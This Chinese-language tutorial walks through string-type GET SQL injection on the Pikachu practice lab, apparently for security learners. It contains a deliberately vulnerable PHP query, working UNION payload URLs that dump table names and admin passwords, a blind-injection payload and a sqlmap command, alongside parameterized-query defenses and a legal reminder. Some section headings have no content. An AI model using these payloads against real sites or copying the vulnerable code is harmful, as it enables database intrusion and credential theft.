Pikachu漏洞练习平台：字符串注入(GET)深度攻防实战

一、漏洞环境初探

Pikachu漏洞练习平台是一个专为网络安全学习者设计的漏洞靶场系统，其中字符串注入(GET)模块模拟了Web应用中最常见的安全漏洞之一。我们先来搭建实验环境：

环境准备

1. 下载Pikachu平台（GitHub开源项目）
2. 部署PHP+MySQL环境（推荐XAMPP/WAMP）
3. 访问/pikachu/vul/sqli/sqli_str-get.php

二、漏洞原理深度解析

1. 危险代码示例

// 后端处理代码（简化版）
$id = $_GET['id']; 
$sql = "SELECT * FROM users WHERE id='$id'";
$result = mysql_query($sql);

2. 漏洞产生条件

3. 注入流程示意图

sequenceDiagram
    用户->>前端: 提交恶意输入
    前端->>后端: 拼接SQL查询
    后端->>数据库: 执行恶意SQL
    数据库-->>后端: 返回敏感数据
    后端-->>前端: 显示查询结果

三、实战注入步骤演示

1. 基础探测

http://target/pikachu/vul/sqli/sqli_str-get.php?id=1'

预期响应：SQL语法错误（确认存在注入）

2. 获取数据库信息

http://target/pikachu/vul/sqli/sqli_str-get.php?id=1' union select 1,version(),3,4,5--+

关键Payload解析：

• union select：联合查询
• version()：获取数据库版本
• --+：注释后续SQL

3. 爆表名实战

http://target/pikachu/vul/sqli/sqli_str-get.php?id=-1' union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--+

4. 获取管理员密码

http://target/pikachu/vul/sqli/sqli_str-get.php?id=-1' union select 1,username,password,4,5 from admin--+

四、防御方案全维度解析

1. 代码层防护

// 最佳实践示例
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$id]);

2. 安全配置对比

3. 应急响应流程

1. 立即下线受影响接口
2. 审计所有SQL查询语句
3. 重置数据库密码
4. 更新补丁并验证

五、自动化检测工具推荐

1. SQLMap基础使用

sqlmap -u "http://target/pikachu/vul/sqli/sqli_str-get.php?id=1" --risk=3 --level=5

2. 常用参数说明

六、CTF实战技巧进阶

1. 盲注Payload示例

http://target/vul.php?id=1' AND (SELECT SUBSTRING(password,1,1) FROM admin)='a'--+

2. 绕过WAF技巧

七、法律与道德边界

重要提醒：

1. 仅限授权测试
2. 禁止恶意攻击
3. 遵守《网络安全法》

4. 漏洞报告流程：

   • 确认漏洞→联系管理员→提交报告→等待修复

结语：构建安全开发思维

通过本次Pikachu平台的字符串注入实验，我们深入理解了：

1. SQL注入的完整攻击链
2. 多种防御方案的优劣对比
3. 自动化工具的正确使用方法

安全开发黄金法则：

"永远不要信任用户输入，始终采用参数化查询"

互动讨论：
大家在实战中还遇到过哪些特殊的SQL注入场景？欢迎分享你的攻防经验！